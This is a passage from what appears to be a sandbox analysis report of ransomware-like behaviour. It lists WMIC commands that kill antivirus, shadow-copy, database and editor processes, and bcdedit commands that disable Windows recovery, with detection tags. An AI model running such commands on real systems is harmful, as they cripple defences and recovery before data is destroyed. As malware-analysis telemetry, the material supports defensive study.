      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate

    C:\Windows\System32\Wbem\WMIC.exe (depth 3)
      command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate

    C:\Windows\system32\bcdedit.exe (depth 3)
      command line: "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text
      - Modifies boot configuration data using bcdedit

    C:\Windows\system32\bcdedit.exe (depth 3)
      command line: "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
      - Modifies boot configuration data using bcdedit

C:\Windows\system32\vssvc.exe (depth 1)
  command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service